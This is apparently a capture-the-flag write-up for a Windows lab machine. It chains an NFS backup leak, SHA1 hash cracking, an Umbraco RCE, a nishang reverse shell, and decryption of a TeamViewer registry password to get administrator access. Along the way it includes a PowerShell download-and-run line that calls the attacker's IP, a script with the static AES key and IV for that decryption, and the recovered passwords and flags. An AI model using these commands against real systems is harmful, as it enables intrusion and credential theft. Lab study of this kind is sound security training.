[Meachines] [Easy] Remote: NFS backup file leak + Umbraco RCE + Te…

2024-09-01

Information Gathering

IP address: 10.10.10.180
Open ports: TCP 21, 80, 111, 135, 139, 445, 2049, 5985, 47001, 49664, 49665, 49666, 49667, 49678, 49679, 49680

nmap -p- 10.10.10.180 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
2049/tcp  open     nlockmgr      1-4 (RPC #100021)
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
22975/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49678/tcp open     msrpc         Microsoft Windows RPC
49679/tcp open     msrpc         Microsoft Windows RPC
49680/tcp open     msrpc         Microsoft Windows RPC
63748/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Umbraco && NFS

$ whatweb http://10.10.10.180/ -v

$ showmount -e 10.10.10.180

$ sudo mkdir -p /mnt/10.10.10.180

$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/10.10.10.180

$ strings App_Data/Umbraco.sdf | grep admin

username:[email protected]
hash:b8be16afba8c314ad33d812f22a04991b90e2aaa

$ hashcat -m 100 b8be16afba8c314ad33d812f22a04991b90e2aaa /usr/share/wordlists/rockyou.txt --force

password:baconandcheese
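Added example (not from the original writeup): a Python script that does what the `strings | grep` and `hashcat -m 100` steps above do, but over any copied backup. It extracts both ASCII and UTF-16LE runs (plain `strings` skips the latter unless run with `-el`), pairs each e-mail address with the nearest 40-hex-digit hash, and checks those hashes against a short list of weak passwords, which is how a defender would audit an exposed backup for leaked, unsalted credentials. The `SAMPLE_BACKUP` bytes, the `WEAK_PASSWORDS` list and all function names are constructed assumptions for illustration, not data from this box.

```python
#!/usr/bin/env python3
"""Triage a binary backup (such as a copied Umbraco .sdf) for credential-like
strings and test any recovered unsalted SHA1 hashes against a short list of
weak passwords (the same check `hashcat -m 100` performs at scale)."""
import hashlib
import re
from typing import Dict, Iterator, List, Tuple

MIN_LEN = 4
# Printable ASCII runs, like the default behaviour of the `strings` tool
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# Printable ASCII characters each followed by NUL: UTF-16LE text, which
# `strings` only reports with -el
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

EMAIL = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
SHA1_HEX = re.compile(r"\b[0-9a-f]{40}\b")


def extract_strings(data: bytes) -> Iterator[Tuple[int, str]]:
    """Yield (offset, text) for every ASCII or UTF-16LE run in `data`."""
    for m in ASCII_RUN.finditer(data):
        yield m.start(), m.group().decode("ascii")
    for m in UTF16_RUN.finditer(data):
        yield m.start(), m.group().decode("utf-16-le")


def find_credentials(data: bytes, window: int = 128) -> List[Dict[str, object]]:
    """Pair each e-mail address with the first 40-hex-digit hash that appears
    within `window` bytes after it, which is how user rows surface in the
    backup. Returns dicts with 'offset', 'email' and 'hash' (None if absent)."""
    runs = sorted(extract_strings(data))
    hits = []
    for i, (off, text) in enumerate(runs):
        for email in EMAIL.findall(text):
            nearby = " ".join(t for o, t in runs[i:] if o - off <= window)
            m = SHA1_HEX.search(nearby)
            hits.append({"offset": off, "email": email, "hash": m.group() if m else None})
    return hits


def check_weak(hits: List[Dict[str, object]], candidates: List[str]) -> Dict[str, str]:
    """Return {email: password} for every hit whose hash equals the plain,
    unsalted SHA1 of a candidate password (hashcat mode 100)."""
    table = {hashlib.sha1(c.encode()).hexdigest(): c for c in candidates}
    return {h["email"]: table[h["hash"]] for h in hits if h["hash"] in table}


# Constructed sample: a fake backup fragment with one ASCII user row and one
# UTF-16LE user row separated by binary noise. Not data from the box above.
SAMPLE_BACKUP = (
    b"\x00\x01\x02\xff" * 4
    + b"admin@example.local\x00\x00"
    + b"\x7f\x80\x81"
    + hashlib.sha1(b"password").hexdigest().encode() + b"\x00"
    + b"\x00\xfe\x10" * 3
    + "operator@example.local".encode("utf-16-le") + b"\x00\x00"
    + hashlib.sha1(b"Summer2024!").hexdigest().encode("utf-16-le")
    + b"\x00" * 8
)
# Constructed weak-password list standing in for rockyou.txt
WEAK_PASSWORDS = ["123456", "password", "Summer2024!", "letmein"]

if __name__ == "__main__":
    found = find_credentials(SAMPLE_BACKUP)
    for hit in found:
        print(f"offset {hit['offset']:#06x}: {hit['email']} -> {hit['hash']}")
    for email, pw in check_weak(found, WEAK_PASSWORDS).items():
        print(f"[!] weak password for {email}: {pw}")
```

Run it against a real mounted backup by replacing `SAMPLE_BACKUP` with `open(path, "rb").read()`; any e-mail that comes back with a password from the weak list is an account whose credential has effectively been published along with the backup.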

Login

http://10.10.10.180/Umbraco#/login/false?returnPath=%252FUmbraco

https://www.exploit-db.com/exploits/46153

Reverse shell

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.24 -Port 10032">>Invoke-PowerShellTcp.ps1

Deliver the PowerShell script to the target

string cmd = "/c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.16.24/Invoke-PowerShellTcp.ps1')";

$ python exp.py

User.txt

c9b78c488c6ae1828b13d050b156d542

Privilege Escalation

TeamViewer application

The msf module notes that the registry path for Version7 is HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7

PS HKLM:\software\wow6432node\teamviewer\version7> get-itemproperty -path .

PS HKLM:\software\wow6432node\teamviewer\version7> (Get-ItemProperty -Path .).SecurityPasswordAES -join ", " | ForEach-Object { "[" + $_ + "]" }

#!/usr/bin/env python3
# Decrypt the TeamViewer password blob read from the registry
# (HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7, value SecurityPasswordAES).
# Requires pycryptodome: pip install pycryptodome

from Crypto.Cipher import AES

# Static key and IV that TeamViewer uses for the stored password values
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"

# Byte array of SecurityPasswordAES as printed by Get-ItemProperty above
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
                    19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
                    126, 141, 55, 107, 38, 57, 78, 91])

aes = AES.new(key, AES.MODE_CBC, iv=iv)
# The plaintext is UTF-16LE and padded with null bytes
password = aes.decrypt(ciphertext).decode("utf-16-le").rstrip("\x00")

print(f"[+] Found password: {password}")

$ python dec.py

$ crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'

$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180

Root.txt

858343dff7922d618a28508565307822